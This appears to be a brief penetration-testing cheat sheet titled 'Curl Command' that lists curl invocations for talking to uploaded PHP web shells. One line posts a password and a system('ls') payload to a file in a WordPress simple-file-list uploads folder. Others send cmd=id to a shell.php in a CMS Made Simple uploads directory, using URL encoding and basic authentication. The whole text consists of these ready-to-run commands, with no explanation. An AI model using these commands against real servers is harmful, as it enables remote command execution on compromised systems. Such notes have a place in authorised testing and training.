Curl Command
Curl command
curl -X POST -d "password=0064bb76d86370d20793bb00572fec23&cmd=system('ls');" http://$nukem/wp-content/uploads/simple-file-list/6247.phpcurl http://$ip/shell.php -u user:passwordURL Encoding using Curl command.
curl "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'curl --get "http://192.168.161.52/cmsms/uploads/shell.php" --data-urlencode 'cmd=id'Last updated